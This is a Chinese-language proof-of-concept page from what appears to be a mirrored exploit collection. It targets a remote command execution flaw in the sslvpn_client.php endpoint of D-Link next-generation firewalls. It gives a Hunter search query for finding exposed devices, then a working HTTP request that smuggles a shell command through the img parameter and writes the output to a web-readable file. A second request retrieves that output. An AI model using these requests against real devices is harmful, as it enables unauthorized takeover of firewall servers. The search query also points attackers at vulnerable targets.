admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-07 03:17:07 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/D-Link/D-Link下一代防火墙sslvpn_client存在远程命令执行漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

41 lines
1.5 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# D-Link下一代防火墙sslvpn_client存在远程命令执行漏洞
# 一、漏洞简介
D-Link下一代防火墙sslvpn_client存在远程命令执行漏洞攻击者可通过该漏洞获取服务器权限。
# 二、影响版本
+ D-Link下一代防火墙
# 三、资产测绘
+ hunter`web.title=="D-Link下一代防火墙"`
+ 特征
![1701766678324-1f5557b7-3893-4c8d-a5df-8cf2ad6ad373.png](./img/KG6VCY8j1nlRnvvQ/1701766678324-1f5557b7-3893-4c8d-a5df-8cf2ad6ad373-805129.png)
# 四、漏洞复现
```java
GET /sslvpn/sslvpn_client.php?client=logoImg&img=x%20/tmp|echo%20%60whoami%60%20|tee%20/usr/local/webui/sslvpn/ceshi.txt|ls HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Host: xx.xx.xx.xx
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
```
![1701762310844-e2bb6845-f268-450b-b1ef-4ddc2f30876e.png](./img/KG6VCY8j1nlRnvvQ/1701762310844-e2bb6845-f268-450b-b1ef-4ddc2f30876e-398392.png)
获取命令执行结果
```java
GET /sslvpn/ceshi.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Host: xx.xx.xx.xx
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
```
![1701762342384-224cbced-19ed-428d-b26d-9957865251d2.png](./img/KG6VCY8j1nlRnvvQ/1701762342384-224cbced-19ed-428d-b26d-9957865251d2-230075.png)
> 更新: 2024-02-29 23:57:12
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/cw2r5v96hvhz36zk>
Reference in New Issue View Git Blame Copy Permalink